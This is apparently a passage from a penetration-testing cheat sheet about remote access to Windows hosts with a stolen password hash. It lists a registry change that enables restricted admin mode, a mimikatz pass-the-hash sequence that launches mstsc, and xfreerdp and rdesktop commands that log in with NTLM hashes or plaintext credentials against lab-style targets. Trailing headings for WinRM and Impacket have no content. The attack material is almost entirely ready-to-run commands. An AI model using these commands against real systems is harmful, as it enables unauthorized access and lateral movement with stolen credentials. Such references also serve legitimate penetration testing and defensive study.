Remote Access
Remote Desktop
If we only have the password hash, we can still use it for remote desktop if we enable restricted admin mode.
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0On Windows, it required to perform PTH with mimikatz
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:vulnableone /ntlm:9e7c6b33d9a2dfc1c9aef53eb2837b32 /run:"mstsc.exe /restrictedadmin"xfreeRDP
xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /cert-ignore
xfreerdp /v:10.10.10.10 /u:administrator /cert-ignore /pth:4f9163ca3b673adfff2828f368ca3763
xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /d:vulnableone.local +clipboardmshta on Windows
mstsc.exe /RestrictedAdmin /v:$hostname
mstsc.exe /v:$hostnamerdesktop
rdesktop 10.10.10.10 -u admin -p password -d vulnableone.local
rdesktop -g 95% -u khan.chanthou -p Password123 10.10.10.10 -x m -P -zWinrs Access
PSSession Remoting
ScriptBlock
Evil-WinRM
Impacket
Last updated